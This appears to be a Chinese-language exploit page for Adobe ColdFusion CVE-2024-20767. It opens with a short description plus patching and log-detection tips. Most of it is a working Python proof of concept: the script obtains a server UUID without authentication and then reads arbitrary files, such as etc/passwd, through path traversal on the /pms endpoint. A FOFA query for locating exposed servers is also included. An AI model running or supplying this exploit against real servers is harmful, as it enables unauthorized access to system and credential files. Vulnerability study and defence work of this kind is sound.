Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767

Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767

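Adobe ColdFusion 在鉴权方面存在缺陷:未经身份验证的请求即可从服务管理接口(getHeartBeat)获取 uuid,携带该 uuid 请求头访问 pms 接口后,可利用 file_name 参数中的路径穿越(../)读取服务器上的任意文件。防护上应安装 Adobe 针对 CVE-2024-20767 发布的安全更新,并限制外部对 /CFIDE/adminapi 与 /pms 路径的访问;排查时可在访问日志中检索 file_name 含 ../ 的 /pms?module=logging 请求。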

fofa

app="Adobe-ColdFusion"

poc

import requests
import re
import urllib3
import argparse

# Silence urllib3's warnings: every request in this script is sent with
# verify=False, so TLS certificate validation is switched off.
urllib3.disable_warnings()

parser = argparse.ArgumentParser()
# The target is later concatenated as target + ":" + port + path, so it has to
# carry the scheme and host only (no port, no trailing path).
parser.add_argument(
    "-t",
    "--target",
    required=True,
    help="Target Adobe ColdFusion Server URL",
)
# No type= is given: a port supplied on the command line stays a string while
# the default is an int; both are passed through str() where they are used.
parser.add_argument(
    "-p",
    "--port",
    required=False,
    default=8500,
    help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port",
)
# Despite the option name, this value is a file path, not a command. It is
# appended unmodified after the "../" prefix of the file_name parameter.
# Path examples from the original author: 'Windows/ServerStandardEval.xml'
# on Windows Server, "etc/passwd" on Linux.
parser.add_argument(
    "-c",
    "--command",
    required=True,
    help="File to read path",
)
args = parser.parse_args()

def get_uuid():
    """Fetch the server-manager heartbeat and return the UUID it discloses.

    Sends one GET, without credentials, to the ``getHeartBeat`` method of
    ``servermanager.cfc`` on ``args.target``:``args.port`` and extracts the
    first ``<var name='uuid'><string>...</string></var>`` value from the body.

    Returns:
        The UUID string, or ``None`` (implicitly) when anything in the
        ``try`` block raises.

    Detection note: in server access logs this step shows up as a request for
    ``/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat``.
    """
    heartbeat_path = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
    uuid_regex = r"<var name='uuid'><string>(.+?)</string></var>"
    http = requests.Session()
    try:
        base_url = args.target + ":" + str(args.port)
        # verify=False: the server certificate is not validated.
        reply = http.get(base_url + heartbeat_path, verify=False)
        print("[+] Connecting to ColdFusion Server...")
        matches = re.findall(uuid_regex, reply.text)
        # Indexing raises IndexError when the body holds no UUID element.
        uuid = matches[0]
        print("[+] UUID Obtained: ", uuid)
        return uuid
    except:
        # Bare except: a response without a UUID (e.g. from a patched server)
        # is reported with the same "connecting" message as a network failure.
        print("[-] Error connecting to server")

def exploit(uuid):
    """Request a file through the ``/pms`` logging module and print the reply.

    The request carries ``uuid`` as a ``uuid`` HTTP header and a ``file_name``
    parameter made of seven ``../`` segments followed by ``args.command``,
    with ``number_of_lines=100``.

    Args:
        uuid: Value for the ``uuid`` request header, as returned by
            ``get_uuid()``.

    Raises:
        KeyError: if the response has no ``Content-Length`` header (the lookup
            is only reached when the status code is 200).

    Detection note: in server access logs this step shows up as a ``/pms``
    request with ``module=logging`` whose ``file_name`` contains ``../``.
    """
    request_headers = {"uuid": uuid}
    http = requests.Session()
    traversal_path = (
        "/pms?module=logging&file_name=../../../../../../../"
        + args.command
        + "&number_of_lines=100"
    )
    # verify=False: the server certificate is not validated.
    reply = http.get(
        args.target + ":" + str(args.port) + traversal_path,
        verify=False,
        headers=request_headers,
    )
    # Success means HTTP 200 with a declared body longer than two bytes.
    got_content = reply.status_code == 200 and int(reply.headers["Content-Length"]) > 2
    if not got_content:
        print("[-] Something went wrong while reading file or the file doesn't exist")
        return
    print("[+] Succesfully read file!")
    print(reply.text)

if __name__ == "__main__":
    # get_uuid() returns None when its request or parsing fails; the read
    # request is still sent with that value.
    server_uuid = get_uuid()
    exploit(server_uuid)